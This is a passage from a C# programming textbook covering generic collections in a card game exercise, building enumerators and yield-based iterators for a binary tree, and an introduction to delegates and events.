collection of four lists (one list for each suit), so it is allocated space for
four items (NumSuits is a constant with the value 4).
6. In the outer for loop, declare a List<PlayingCard> collection object
called cardsInSuit that is big enough to hold the number of cards in each
suit (use the CardsPerSuit constant), as follows in bold:
public Pack()
{
this.cardPack = new Dictionary<Suit, List<PlayingCard>>
(NumSuits);
for (Suit suit = Suit.Clubs; suit <= Suit.Spades; suit++)
{
List<PlayingCard> cardsInSuit = new List<PlayingCard>
(CardsPerSuit);
for (Value value = Value.Two; value <= Value.Ace;
value++)
{
...
}
}
}
7. Change the code in the inner for loop to add new PlayingCard objects to
this collection rather than to the array, as shown in bold in the following
code:
for (Suit suit = Suit.Clubs; suit <= Suit.Spades; suit++)
{
List<PlayingCard> cardsInSuit = new List<PlayingCard>
(CardsPerSuit);
for (Value value = Value.Two; value <= Value.Ace; value++)
{
cardsInSuit.Add(new PlayingCard(suit, value));
}
}
8. After the inner for loop, add the List object to the cardPack Dictionary
collection, specifying the value of the suit variable as the key to this
item:
for (Suit suit = Suit.Clubs; suit <= Suit.Spades; suit++)
{
List<PlayingCard> cardsInSuit = new List<PlayingCard>
(CardsPerSuit);
for (Value value = Value.Two; value <= Value.Ace; value++)
{
cardsInSuit.Add(new PlayingCard(suit, value));
}
this.cardPack.Add(suit, cardsInSuit);
}
9. Find the DealCardFromPack method.
This method picks a card at random from the pack, removes the card
from the pack, and returns this card. The logic for selecting the card
does not require any changes, but the statements at the end of the
method that retrieve the card from the array must be updated to use the
Dictionary collection instead. Additionally, the code that removes the
card from the array (it has now been dealt) must be modified; you need
to search for the card in the list and then remove it from the list. To
locate the card, use the Find method and specify a predicate that finds a
card with the matching value. The parameter to the predicate should be a
PlayingCard object (the list contains PlayingCard items).
The updated statements occur after the closing brace of the second while
loop, as shown in bold in the following code:
public PlayingCard DealCardFromPack()
{
Suit suit = (Suit)randomCardSelector.Next(NumSuits);
while (this.IsSuitEmpty(suit))
{
suit = (Suit)randomCardSelector.Next(NumSuits);
}
Value value = (Value)randomCardSelector.Next(CardsPerSuit);
while (this.IsCardAlreadyDealt(suit, value))
{
value = (Value)randomCardSelector.Next(CardsPerSuit);
}
List<PlayingCard> cardsInSuit = this.cardPack[suit];
PlayingCard card = cardsInSuit.Find(c => c.CardValue ==
value);
cardsInSuit.Remove(card);
return card;
}
10. Locate the IsCardAlreadyDealt method.
This method determines whether a card has already been dealt by
checking whether the corresponding element in the array has been set to
null. You need to modify this method to determine whether a card with
the specified value is present in the list for the suit in the cardPack
Dictionary collection.
To determine whether an item exists in a List<T> collection, you use the
Exists method. This method is similar to Find in as much as it takes a
predicate as its argument. The predicate is passed each item from the
collection in turn, and it should return true if the item matches some
specified criteria, and false otherwise. In this case, the List<T>
collection holds PlayingCard objects, and the criteria for the Exists
predicate should return true if it is passed a PlayingCard item with a suit
and value that matches the parameters passed to the IsCardAlreadyDealt
method.
Update the method, as shown in the following example in bold:
private bool IsCardAlreadyDealt(Suit suit, Value value)
{
List<PlayingCard> cardsInSuit = this.cardPack[suit];
return (!cardsInSuit.Exists(c => c.CardSuit == suit &&
c.CardValue == value));
}
11. Display the Hand.cs file in the Code and Text Editor window. Add the
following using directive to the list at the top of the file:
using System.Collections.Generic;
12. The Hand class currently uses an array called cards to hold the playing
cards for the hand. Modify the definition of the cards variable to be a
List<PlayingCard> collection, as shown here in bold:
class Hand
{
public const int HandSize = 13;
private List<PlayingCard> cards = new List<PlayingCard>
(HandSize);
...
}
13. Find the AddCardToHand method.
This method currently checks to see whether the hand is full; if it is not,
it adds the card provided as the parameter to the cards array at the index
specified by the playingCardCount variable.
Update this method to use the Add method of the List<PlayingCard>
collection instead.
This change also removes the need to explicitly keep track of how many
cards the collection holds because you can use the Count property of the
cards collection instead. Therefore, remove the playingCardCount
variable from the class and modify the if statement that checks whether
the hand is full to reference the Count property of the cards collection.
The completed method should look like this, with the changes
highlighted in bold:
public void AddCardToHand(PlayingCard cardDealt)
{
if (this.cards.Count >= HandSize)
{
throw new ArgumentException("Too many cards");
}
this.cards.Add(cardDealt);
}
14. On the Debug menu, click Start Debugging to build and run the
application.
15. When the Card Game form appears, click Deal.
Note The Deal button is located on the command bar. You may
need to expand the command bar to reveal the button.
Verify that the cards are dealt and that the populated hands appear as
before. Click Deal again to generate another random set of hands.
The following image shows the application running:
16. Return to Visual Studio 2017 and stop debugging.
Summary
In this chapter, you learned how to use some of the common collection
classes to store and access data. In particular, you learned how to use generic
collection classes to create type-safe collections. You also learned how to
create lambda expressions to search for specific items within collections.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 19, “Enumerating collections.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To create a new collection
Use the constructor for the collection class. For example:

List<PlayingCard> cards = new List<PlayingCard>();

To add an item to a collection
Use the Add or Insert methods (as appropriate) for lists, hash sets, and
dictionary-oriented collections. Use the Enqueue method for Queue<T>
collections. Use the Push method for Stack<T> collections. For example:

HashSet<string> employees = new HashSet<string>();
employees.Add("John");
...
LinkedList<int> data = new LinkedList<int>();
data.AddFirst(101);
...
Stack<int> numbers = new Stack<int>();
numbers.Push(99);

To remove an item from a collection
Use the Remove method for lists, hash sets, and dictionary-oriented
collections. Use the Dequeue method for Queue<T> collections. Use the
Pop method for Stack<T> collections. For example:

HashSet<string> employees = new HashSet<string>();
employees.Remove("John");
...
LinkedList<int> data = new LinkedList<int>();
data.Remove(101);
...
Stack<int> numbers = new Stack<int>();
...
int item = numbers.Pop();

To find the number of elements in a collection
Use the Count property. For example:

List<PlayingCard> cards = new List<PlayingCard>();
...
int noOfCards = cards.Count;

To locate an item in a collection
For dictionary-oriented collections, use array notation. For lists, use
the Find methods. For example:

Dictionary<string, int> ages = new Dictionary<string, int>();
ages.Add("John", 47);
int johnsAge = ages["John"];
...
List<Person> personnel = new List<Person>();
Person match = personnel.Find(p => p.ID == 3);

Note: The Stack<T>, Queue<T>, and hash set collection classes do not
support searching, although you can test for membership of an item in a
hash set by using the Contains method.

To iterate through the elements of a collection
Use a for statement or a foreach statement. For example:

LinkedList<int> numbers = new LinkedList<int>();
...
for (LinkedListNode<int> node = numbers.First; node != null; node = node.Next)
{
    int number = node.Value;
    Console.WriteLine(number);
}
...
foreach (int number in numbers)
{
    Console.WriteLine(number);
}
CHAPTER 19
Enumerating collections
After completing this chapter, you will be able to:
Manually define an enumerator that you can use to iterate over the
elements in a collection.
Implement an enumerator automatically by creating an iterator.
Provide additional iterators that can step through the elements of a
collection in different sequences.
Chapter 10, “Using arrays,” and Chapter 18, “Using collections,” show how
you work with arrays and collection classes for holding sequences or sets of
data. Chapter 10 also details the foreach statement, which you can use to step
through, or iterate over, the elements in a collection. In these chapters, you
use the foreach statement as a quick and convenient way of accessing the
contents of an array or a collection, but now it is time to learn a little more
about how this statement actually works. This topic becomes important when
you define your own collection classes, and this chapter describes how you
can make collections enumerable.
Enumerating the elements in a collection
Chapter 10 presents an example of using the foreach statement to list the
items in a simple array. The code looks like this:
int[] pins = { 9, 3, 7, 2 };
foreach (int pin in pins)
{
Console.WriteLine(pin);
}
The foreach construct provides an elegant mechanism that greatly
simplifies the code you need to write, but it can be exercised only under
certain circumstances—you can use foreach only to step through an
enumerable collection.
But what exactly is an enumerable collection? The quick answer is that it
is a collection that implements the System.Collections.IEnumerable interface.
Note Remember that all arrays in C# are actually instances of the
System.Array class. The System.Array class is a collection class that
implements the IEnumerable interface.
The IEnumerable interface contains a single method called
GetEnumerator:
IEnumerator GetEnumerator();
The GetEnumerator method should return an enumerator object that
implements the System.Collections.IEnumerator interface. The enumerator
object is used for stepping through (enumerating) the elements of the
collection. The IEnumerator interface specifies the following property and
methods:
object Current { get; }
bool MoveNext();
void Reset();
Think of an enumerator as a pointer indicating elements in a list. Initially,
the pointer points before the first element. You call the MoveNext method to
move the pointer down to the next (first) item in the list; the MoveNext
method should return true if there actually is another item and false if there
isn’t. You use the Current property to access the item currently pointed to,
and you use the Reset method to return the pointer back to before the first
item in the list. By using the GetEnumerator method of a collection to create
an enumerator, repeatedly calling the MoveNext method, and using the
enumerator to retrieve the value of the Current property, you can move
forward through the elements of a collection one item at a time. This is
exactly what the foreach statement does. So, if you want to create your own
enumerable collection class, you must implement the IEnumerable interface
in your collection class and also provide an implementation of the
IEnumerator interface to be returned by the GetEnumerator method of the
collection class.
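By way of illustration, the following sketch performs manually the same steps that foreach carries out for an array (the nongeneric Current property returns an object, so a cast is required):

using System.Collections;
...
int[] pins = { 9, 3, 7, 2 };
IEnumerator enumerator = pins.GetEnumerator(); // arrays implement IEnumerable
while (enumerator.MoveNext())
{
    int pin = (int)enumerator.Current;
    Console.WriteLine(pin);
}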
Important At first glance, it is easy to confuse the IEnumerable and
IEnumerator interfaces because their names are so similar. Be certain
not to mix them up.
If you are observant, you will have noticed that the Current property of
the IEnumerator interface exhibits non–type-safe behavior in that it returns
an object rather than a specific type. However, you should be pleased to
know that the Microsoft .NET Framework class library also provides the
generic IEnumerator<T> interface, which has a Current property that returns
a T instead. Likewise, there is also an IEnumerable<T> interface containing
a GetEnumerator method that returns an IEnumerator<T> object. Both of
these interfaces are defined in the System.Collections.Generic namespace,
and if you are building applications for the .NET Framework version 2.0 or
later, you should make use of these generic interfaces rather than the
nongeneric versions when you define enumerable collections.
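In simplified form (omitting details such as interface variance), the generic interfaces look like this:

public interface IEnumerator<T> : IEnumerator, IDisposable
{
    new T Current { get; }
}

public interface IEnumerable<T> : IEnumerable
{
    new IEnumerator<T> GetEnumerator();
}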
Manually implementing an enumerator
In the following exercise, you will define a class that implements the generic
IEnumerator<T> interface and create an enumerator for the binary tree class
that is demonstrated in Chapter 17, “Introducing generics.”
Chapter 17 illustrates how easy it is to traverse a binary tree and display
its contents. You would, therefore, be inclined to think that defining an
enumerator that retrieves each element in a binary tree in the same order
would be a simple matter. Sadly, you would be mistaken. The main problem
is that when defining an enumerator, you need to remember where you are in
the structure so that subsequent calls to the MoveNext method can update the
position appropriately. Recursive algorithms, such as those used when
walking a binary tree, do not lend themselves to maintaining state
information between method calls in an easily accessible manner. For this
reason, you will first preprocess the data in the binary tree into a more
amenable data structure (a queue) and actually enumerate this data structure
instead. Of course, this deviousness is hidden from the user iterating through
the elements of the binary tree!
Create the TreeEnumerator class
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the BinaryTree solution, which is located in the \Microsoft
Press\VCSBS\Chapter 19\ BinaryTree folder in your Documents folder.
This solution contains a working copy of the BinaryTree project you
created in Chapter 17. You will add a new class to this project in which
to implement the enumerator for the BinaryTree class.
3. In Solution Explorer, click the BinaryTree project. On the Project menu,
click Add Class to open the Add New Item - BinaryTree dialog box. In
the middle pane, select the Class template, type TreeEnumerator.cs in
the Name box, and then click Add.
4. The TreeEnumerator class will generate an enumerator for a
Tree<TItem> object. To ensure that the class is type safe, you must
provide a type parameter and implement the IEnumerator<T> interface.
Also, the type parameter must be a valid type for the Tree<TItem>
object that the class enumerates, so it must be constrained to implement
the IComparable<TItem> interface (the BinaryTree class requires that
items in the tree provide a means to be compared for sorting purposes).
In the Code and Text Editor window displaying the TreeEnumerator.cs
file, modify the definition of the TreeEnumerator class to satisfy these
requirements, as shown in bold in the following example:
class TreeEnumerator<TItem> : IEnumerator<TItem> where TItem :
IComparable<TItem>
{
}
5. Add the following three private variables, shown in the following code
in bold to the TreeEnumerator<TItem> class:
class TreeEnumerator<TItem> : IEnumerator<TItem> where TItem :
IComparable<TItem>
{
private Tree<TItem> currentData = null;
private TItem currentItem = default(TItem);
private Queue<TItem> enumData = null;
}
The currentData variable will be used to hold a reference to the tree
being enumerated, and the currentItem variable will hold the value
returned by the Current property. You will populate the enumData
queue with the values extracted from the nodes in the tree, and the
MoveNext method will return each item from this queue in turn. The
default keyword is explained in the section “Initializing a variable
defined with a type parameter” later in this chapter.
6. Add a constructor that takes a Tree<TItem> parameter called data to the
TreeEnumerator <TItem> class. In the body of the constructor, add the
statement shown in bold that initializes the currentData variable to data:
class TreeEnumerator<TItem> : IEnumerator<TItem> where TItem :
IComparable<TItem>
{
...
public TreeEnumerator(Tree<TItem> data)
{
this.currentData = data;
}
}
7. Add the following private method shown in bold, called populate, to the
TreeEnumerator<TItem> class, immediately after the constructor:
class TreeEnumerator<TItem> : IEnumerator<TItem> where TItem :
IComparable<TItem>
{
...
public TreeEnumerator(Tree<TItem> data)
{
this.currentData = data;
}
private void populate(Queue<TItem> enumQueue, Tree<TItem>
tree)
{
if (tree.LeftTree != null)
{
populate(enumQueue, tree.LeftTree);
}
enumQueue.Enqueue(tree.NodeData);
if (tree.RightTree != null)
{
populate(enumQueue, tree.RightTree);
}
}
}
This method walks the binary tree, adding the data it contains to the
queue. The algorithm used is similar to that used by the WalkTree
method in the Tree<TItem> class, which is described in Chapter 17. The
main difference is that rather than appending NodeData values to a
string, the method stores these values in the queue.
8. Return to the definition of the TreeEnumerator<TItem> class. In the
class declaration, hover over the text IEnumerator<TItem>. On the
drop-down context menu that appears (with a lightbulb icon), click
Implement Interface Explicitly.
This action generates stubs for the methods in the IEnumerator<TItem>
interface and the IEnumerator interface and adds them to the end of the
class. It also generates the Dispose method for the IDisposable interface.
Note The IEnumerator<TItem> interface inherits from the
IEnumerator and IDisposable interfaces, which is why their
methods also appear. In fact, the only item that belongs to the
IEnumerator<TItem> interface is the generic Current property.
The MoveNext and Reset methods belong to the nongeneric
IEnumerator interface. Chapter 14, “Using garbage collection and
resource management,” describes the IDisposable interface.
9. Examine the code that has been generated.
The bodies of the properties and methods contain a default
implementation that simply throws a NotImplementedException
exception. You will replace this code in the following steps.
10. Update the body of the MoveNext method and replace the throw new
NotImplementedException() statement with the code shown in
bold here:
bool IEnumerator.MoveNext()
{
if (this.enumData == null)
{
this.enumData = new Queue<TItem>();
populate(this.enumData, this.currentData);
}
if (this.enumData.Count > 0)
{
this.currentItem = this.enumData.Dequeue();
return true;
}
return false;
}
The purpose of the MoveNext method of an enumerator is actually
twofold. The first time it is called, it should initialize the data used by
the enumerator and advance to the first piece of data to be returned.
(Before MoveNext is called for the first time, the value returned by
the Current property is undefined and should result in an exception.) In
this case, the initialization process consists of instantiating the queue and
then calling the populate method to fill the queue with data extracted
from the tree.
Subsequent calls to the MoveNext method should just move through data
items until there are no more left, dequeuing items until the queue is
empty, as in this example. It is important to keep in mind that MoveNext
does not actually return data items—that is the purpose of the Current
property. All MoveNext does is update the internal state in the
enumerator (that is, the value of the currentItem variable is set to the
data item extracted from the queue) for use by the Current property,
returning true if there is a next value and false otherwise.
11. Modify the definition of the get accessor of the generic Current property
and replace the expression-bodied member with the following code
shown in bold:
TItem IEnumerator<TItem>.Current
{
get
{
if (this.enumData == null)
{
throw new InvalidOperationException("Use MoveNext before calling Current");
}
return this.currentItem;
}
}
Important Be sure to add the code to the correct implementation
of the Current property. Leave the nongeneric version,
System.Collections.IEnumerator.Current, with its default
implementation that throws a NotImplementedException exception.
The Current property examines the enumData variable to ensure that
MoveNext has been called. (This variable will be null before the first call
to MoveNext.) If this is not the case, the property throws an
InvalidOperationException—this is the conventional mechanism used
by .NET Framework applications to indicate that an operation cannot be
performed in the current state. If MoveNext has been called beforehand,
it will have updated the currentItem variable, so all the Current property
needs to do is return the value in this variable.
12. Locate the IDisposable.Dispose method. Comment out the throw new
NotImplementedException(); statement as shown in bold in the code that
follows. The enumerator does not use any resources that require explicit
disposal, so this method does not need to do anything. It must still be
present, however. For more information about the Dispose method, refer
to Chapter 14.
void IDisposable.Dispose()
{
// throw new NotImplementedException();
}
13. Build the solution, and correct errors if any are reported.
Initializing a variable defined with a type parameter
You should have noticed that the statement that defines and initializes
the currentItem variable uses the default keyword:
private TItem currentItem = default(TItem);
The currentItem variable is defined by using the type parameter
TItem. When the program is written and compiled, the actual type that
will be substituted for TItem might not be known; this issue is resolved
only when the code is executed. This makes it difficult to specify how
the variable should be initialized. The temptation is to set it to null.
However, if the type substituted for TItem is a value type, this is an
illegal assignment. (You cannot set value types to null, only reference
types.) Similarly, if you set it to 0 with the expectation that the type will
be numeric, this will be illegal if the type used is actually a reference
type. There are other possibilities as well; TItem could be a boolean, for
example. The default keyword solves this problem. The value used to
initialize the variable will be determined when the statement is
executed. If TItem is a reference type, default(TItem) returns null; if
TItem is numeric, default(TItem) returns 0; if TItem is a boolean,
default(TItem) returns false. If TItem is a struct, the individual fields in
the struct are initialized in the same way. (Reference fields are set to
null, numeric fields are set to 0, and boolean fields are set to false.)
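For example:

int i = default(int);       // 0
bool b = default(bool);     // false
string s = default(string); // null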
Implementing the IEnumerable interface
In the following exercise, you will modify the binary tree class to implement
the IEnumerable<T> interface. The GetEnumerator method will return a
TreeEnumerator<TItem> object.
Implement the IEnumerable<TItem> interface in the Tree<TItem> class
1. In Solution Explorer, double-click the file Tree.cs to display the
Tree<TItem> class in the Code and Text Editor window.
2. Modify the definition of the Tree<TItem> class so that it implements the
IEnumerable<TItem> interface, as shown in bold in the following code:
public class Tree<TItem> : IEnumerable<TItem> where TItem :
IComparable<TItem>
Notice that constraints are always placed at the end of the class
definition.
3. Hover over the IEnumerable<TItem> interface in the class definition.
On the drop-down context menu that appears, click Implement Interface
Explicitly.
This action generates implementations of the
IEnumerable<TItem>.GetEnumerator and IEnumerable.GetEnumerator
methods and adds them to the class. The nongeneric IEnumerable
interface method is implemented because the generic
IEnumerable<TItem> interface inherits from IEnumerable.
4. Locate the generic IEnumerable<TItem>.GetEnumerator method near
the end of the class. Modify the body of the GetEnumerator() method,
replacing the existing throw statement, as shown in bold in the following
example:
IEnumerator<TItem> IEnumerable<TItem>.GetEnumerator()
{
return new TreeEnumerator<TItem>(this);
}
The purpose of the GetEnumerator method is to construct an enumerator
object for iterating through the collection. In this case, all you need to do
is build a new TreeEnumerator<TItem> object by using the data in the
tree.
5. Build the solution. Correct any errors that are reported, and rebuild the
solution if necessary.
You will now test the modified Tree<TItem> class by using a foreach
statement to iterate through a binary tree and display its contents.
Test the enumerator
1. In Solution Explorer, right-click the BinaryTree solution, point to Add,
and then click New Project.
2. Add a new project by using the Console App (.NET Framework)
template. Name the project EnumeratorTest, set the location to
\Microsoft Press\VCSBS\Chapter 19\BinaryTree in your Documents
folder, and then click OK.
3. Right-click the EnumeratorTest project in Solution Explorer, and then
click Set As StartUp Project.
4. On the Project menu, click Add Reference. In the Reference Manager -
EnumeratorTest dialog box, in the left pane, expand the Projects node
and click Solution. In the middle pane, select the BinaryTree project,
and then click OK.
The BinaryTree assembly appears in the list of references for the
EnumeratorTest project in Solution Explorer.
5. In the Code and Text Editor window displaying the Program class, add
the following using directive to the list at the top of the file:
using BinaryTree;
6. Add the statements shown below in bold to the Main method. These
statements create and populate a binary tree of integers:
static void Main(string[] args)
{
Tree<int> tree1 = new Tree<int>(10);
tree1.Insert(5);
tree1.Insert(11);
tree1.Insert(5);
tree1.Insert(-12);
tree1.Insert(15);
tree1.Insert(0);
tree1.Insert(14);
tree1.Insert(-8);
tree1.Insert(10);
}
7. Add a foreach statement, as follows in bold, that enumerates the
contents of the tree and displays the results:
static void Main(string[] args)
{
...
foreach (int item in tree1)
{
Console.WriteLine(item);
}
}
8. On the Debug menu, click Start Without Debugging.
The program runs and displays the values in the following sequence:
–12, –8, 0, 5, 5, 10, 10, 11, 14, 15
9. Press Enter to return to Visual Studio 2017.
Implementing an enumerator by using an iterator
As you can see, the process of making a collection enumerable can become
complex and is potentially prone to error. To make life easier, C# provides
iterators that can automate much of this process.
An iterator is a block of code that yields an ordered sequence of values.
An iterator is not actually a member of an enumerable class; rather, it
specifies the sequence that an enumerator should use for returning its values.
In other words, an iterator is just a description of the enumeration sequence
that the C# compiler can use for creating its own enumerator. This concept
requires a little thought to understand properly, so consider the following
simple example.
A simple iterator
The following BasicCollection<T> class illustrates the principles of
implementing an iterator. The class uses a List<T> object for holding data
and provides the FillList method for populating this list. Notice also that the
BasicCollection<T> class implements the IEnumerable<T> interface. The
GetEnumerator method is implemented by using an iterator:
using System;
using System.Collections.Generic;
using System.Collections;
class BasicCollection<T> : IEnumerable<T>
{
private List<T> data = new List<T>();
public void FillList(params T [] items)
{
foreach (var datum in items)
{
data.Add(datum);
}
}
IEnumerator<T> IEnumerable<T>.GetEnumerator()
{
foreach (var datum in data)
{
yield return datum;
}
}
IEnumerator IEnumerable.GetEnumerator()
{
// Not implemented in this example
throw new NotImplementedException();
}
}
The GetEnumerator method appears to be straightforward, but it warrants
closer examination. The first thing to notice is that it doesn’t appear to return
an IEnumerator<T> type. Instead, it loops through the items in the data
array, returning each item in turn. The key point is the use of the yield
keyword. The yield keyword indicates the value that should be returned by
each iteration. If it helps, you can think of the yield statement as calling a
temporary halt to the method, passing back a value to the caller. When the
caller needs the next value, the GetEnumerator method continues at the point
at which it left off, looping around and then yielding the next value.
Eventually, the data is exhausted, the loop finishes, and the GetEnumerator
method terminates. At this point, the iteration is complete.
Remember that this is not a normal method in the usual sense. The code in
the GetEnumerator method defines an iterator. The compiler uses this code
to generate an implementation of the IEnumerator<T> class containing a
Current method and a MoveNext method. This implementation exactly
matches the functionality specified by the GetEnumerator method. You don’t
actually get to see this generated code (unless you decompile the assembly
containing the compiled code), but that is a small price to pay for the
convenience and reduction in code that you need to write. You can invoke the
enumerator generated by the iterator in the usual manner, as shown in the
following block of code, which displays the words in the first line of the
poem “Jabberwocky” by Lewis Carroll:
BasicCollection<string> bc = new BasicCollection<string>();
bc.FillList("Twas", "brillig", "and", "the", "slithy", "toves");
foreach (string word in bc)
{
Console.WriteLine(word);
}
This code simply outputs the contents of the bc object in this order:
Twas, brillig, and, the, slithy, toves
If you want to provide alternative iteration mechanisms to present the data
in a different sequence, you can implement additional properties that
implement the IEnumerable interface and that use an iterator for returning
data. For example, the Reverse property of the BasicCollection<T> class,
shown here, emits the data in the list in reverse order:
class BasicCollection<T> : IEnumerable<T>
{
...
public IEnumerable<T> Reverse
{
get
{
for (int i = data.Count - 1; i >= 0; i--)
{
yield return data[i];
}
}
}
}
You can invoke this property as follows:
BasicCollection<string> bc = new BasicCollection<string>();
bc.FillList("Twas", "brillig", "and", "the", "slithy", "toves");
foreach (string word in bc.Reverse)
{
Console.WriteLine(word);
}
This code outputs the contents of the bc object in reverse order:
toves, slithy, the, and, brillig, Twas
Defining an enumerator for the Tree<TItem> class by
using an iterator
In the next exercise, you will implement the enumerator for the Tree<TItem>
class by using an iterator. Unlike in the preceding set of exercises, which
required the data in the tree to be preprocessed into a queue by the MoveNext
method, here you can define an iterator that traverses the tree by using the
more naturally recursive mechanism, similar to the WalkTree method
discussed in Chapter 17.
Add an enumerator to the Tree<TItem> class
1. Using Visual Studio 2017, open the BinaryTree solution, located in the
\Microsoft Press\VCSBS\Chapter 19\IteratorBinaryTree folder in your
Documents folder. This solution contains another copy of the
BinaryTree project you created in Chapter 17.
2. Open the file Tree.cs in the Code and Text Editor window. Modify the
definition of the Tree<TItem> class so that it implements the
IEnumerable<TItem> interface, as shown here in bold:
public class Tree<TItem> : IEnumerable<TItem> where TItem :
IComparable<TItem>
{
...
}
3. Hover over the IEnumerable<TItem> interface in the class definition.
On the drop-down context menu that appears, click Implement Interface
Explicitly to add the IEnumerable<TItem>. GetEnumerator and
IEnumerable.GetEnumerator methods to the end of the class.
4. Locate the generic IEnumerable<TItem>.GetEnumerator method.
Replace the contents of the GetEnumerator method as shown in bold in
the following code:
IEnumerator<TItem> IEnumerable<TItem>.GetEnumerator()
{
if (this.LeftTree != null)
{
foreach (TItem item in this.LeftTree)
{
yield return item;
}
}
yield return this.NodeData;
if (this.RightTree != null)
{
foreach (TItem item in this.RightTree)
{
yield return item;
}
}
}
It might not be obvious at first glance, but this code follows the same
recursive algorithm that you used in Chapter 17 for listing the contents
of a binary tree. If LeftTree is not empty, the first foreach statement
implicitly calls the GetEnumerator method (which you are currently
defining) over it. This process continues until a node is found that has no
left subtree. At this point, the value in the NodeData property is yielded,
and the right subtree is examined in the same way. When the right
subtree is exhausted, the process unwinds to the parent node, outputting
the parent’s NodeData property and examining the right subtree of the
parent. This course of action continues until the entire tree has been
enumerated and all the nodes have been output.
Test the new enumerator
1. In Solution Explorer, right-click the BinaryTree solution, point to Add,
and then click Existing Project. In the Add Existing Project dialog box,
move to the folder \Microsoft Press\VCSBS\Chapter
19\BinaryTree\EnumeratorTest, select the EnumeratorTest project file,
and then click Open.
This is the project that you created to test the enumerator you developed
manually earlier in this chapter.
2. Right-click the EnumeratorTest project in Solution Explorer, and then
click Set As StartUp Project.
3. In Solution Explorer, expand the References folder for the
EnumeratorTest project. Right-click the BinaryTree reference and then
click Remove.
4. On the Project menu, click Add Reference.
5. In the Reference Manager - EnumeratorTest dialog box, in the left pane,
expand the Projects node and click Solution. In the middle pane, select
the BinaryTree project, and then click OK.
Note These two steps ensure that the EnumeratorTest project
references the correct version of the BinaryTree assembly. It
should use the assembly that implements the enumerator by using
the iterator rather than the version created in the previous set of
exercises in this chapter.
6. Display the Program.cs file for the EnumeratorTest project in the Code
and Text Editor window. Review the Main method in the Program.cs
file. Recall from testing the earlier enumerator that this method
instantiates a Tree<int> object, fills it with some data, and then uses a
foreach statement to display its contents.
7. Build the solution, and correct any errors if necessary.
8. On the Debug menu, click Start Without Debugging.
The program runs and displays the values in the same sequence as
before.
–12, –8, 0, 5, 5, 10, 10, 11, 14, 15
9. Press Enter and return to Visual Studio 2017.
Summary
In this chapter, you saw how to implement the IEnumerable<T> and
IEnumerator<T> interfaces with a collection class to enable applications to
iterate through the items in the collection. You also saw how to implement an
enumerator by using an iterator.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 20, “Decoupling application logic and
handling events.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To make a collection class enumerable, allowing it to support the
foreach construct
Implement the IEnumerable interface and provide a GetEnumerator method
that returns an IEnumerator object. For example:

public class Tree<TItem> : IEnumerable<TItem>
{
    ...
    IEnumerator<TItem> GetEnumerator()
    {
        ...
    }
}

To implement an enumerator without using an iterator
Define an enumerator class that implements the IEnumerator interface,
and that provides the Current property and the MoveNext method (and
optionally the Reset method). For example:

public class TreeEnumerator<TItem> : IEnumerator<TItem>
{
    ...
    TItem Current
    {
        get
        {
            ...
        }
    }

    bool MoveNext()
    {
        ...
    }
}

To define an enumerator by using an iterator
Implement the enumerator to indicate which items should be returned
(using the yield statement) and in which order. For example:

IEnumerator<TItem> GetEnumerator()
{
    for (...)
    {
        yield return ...
    }
}
CHAPTER 20
Decoupling application logic and
handling events
After completing this chapter, you will be able to:
Declare a delegate type to create an abstraction of a method signature.
Create an instance of a delegate to refer to a specific method.
Call a method through a delegate.
Define a lambda expression to specify the code to be executed by a
delegate.
Declare an event field.
Handle an event by using a delegate.
Raise an event.
Many of the examples and exercises in this book have placed great
emphasis on the careful definition of classes and structures to enforce
encapsulation. In this way, the implementation of the methods in these types
can change without unduly affecting the applications that use them.
Sometimes, however, it is not possible or desirable to encapsulate the entire
functionality of a type. For example, the logic for a method in a class might
depend upon which component or application invokes this method, which
might need to perform some application or component-specific processing as
part of its operation. However, when you build such a class and implement its
methods, you might not know which applications and components are going
to use it, and you need to avoid introducing dependencies in your code that
might restrict the use of your class. Delegates provide the ideal solution,
making it possible for you to fully decouple the application logic in your
methods from the applications that invoke them.
Events in C# support a related scenario. Much of the code you have
written in the exercises in this book assumes that statements execute
sequentially. Although this is the most common case, you will find that it is
sometimes necessary to interrupt the current flow of execution to perform
another, more important task. When that task is complete, the program can
continue where it left off. The classic examples of this style of program are
the Universal Windows Platform (UWP) forms that you have been using in
the exercises involving graphical applications. A form displays controls such
as buttons and text boxes. When you click a button or type text in a text box,
you expect the form to respond immediately. The application has to
temporarily stop what it is doing and handle your input. This style of
operation applies not only to graphical user interfaces (GUIs) but also to any
application where an operation must be performed urgently—shutting down
the reactor in a nuclear power plant if it is getting too hot, for example. To
handle this kind of processing, the runtime has to provide two things: a
means of indicating that something urgent has happened, and a way of
specifying the code that should be run when the urgent event happens.
Events, in conjunction with delegates, provide the infrastructure with which
you can implement systems that follow this approach.
You’ll start by looking at delegates.
Understanding delegates
A delegate is a reference to a method. It is a very simple concept with
extraordinarily powerful implications. Let me explain.
Note Delegates are so named because they “delegate” processing to the
referenced method when they are invoked.
Typically, when you write a statement that invokes a method, you specify
the name of the method (and possibly specify the object or structure to which
the method belongs). It is clear from your code exactly which method you are
running and when you are running it. Look at the following simple example
that calls the performCalculation method of a Processor object (what this
method does or how the Processor class is defined is immaterial for this
discussion):
Processor p = new Processor();
p.performCalculation();
A delegate is an object that refers to a method. You can assign a reference
to a method to a delegate in much the same way that you can assign an int
value to an int variable. The next example creates a delegate named
performCalculationDelegate that references the performCalculation method
of the Processor object. I have deliberately omitted some elements of the
statement that declares the delegate because it is more important to
understand the concept rather than worry about the syntax (you will see the
full syntax shortly).
Processor p = new Processor();
delegate ... performCalculationDelegate ...;
performCalculationDelegate = p.performCalculation;
Keep in mind that the statement that assigns the method reference to the
delegate does not run the method at that point; there are no parentheses after
the method name, and you do not specify any parameters (if the method takes
them). This is just an assignment statement.
Having stored a reference to the performCalculation method of the
Processor object in the delegate, the application can subsequently invoke the
method through the delegate, like this:
performCalculationDelegate();
This looks like an ordinary method call; if you did not know otherwise, it
looks like you might actually be running a method named
performCalculationDelegate. However, the common language runtime
(CLR) knows that this is a delegate, so it retrieves the method that the
delegate references and runs that instead. Later on, you can change the
method to which a delegate refers, so a statement that calls a delegate might
actually run a different method each time it executes. Additionally, a delegate
can reference more than one method at a time (think of it as a collection of
method references), and when you invoke a delegate, all the methods to
which it refers will run.
Note If you are familiar with C++, a delegate is similar to a function
pointer. However, unlike function pointers, delegates are completely
type safe. You can make a delegate refer only to a method that matches
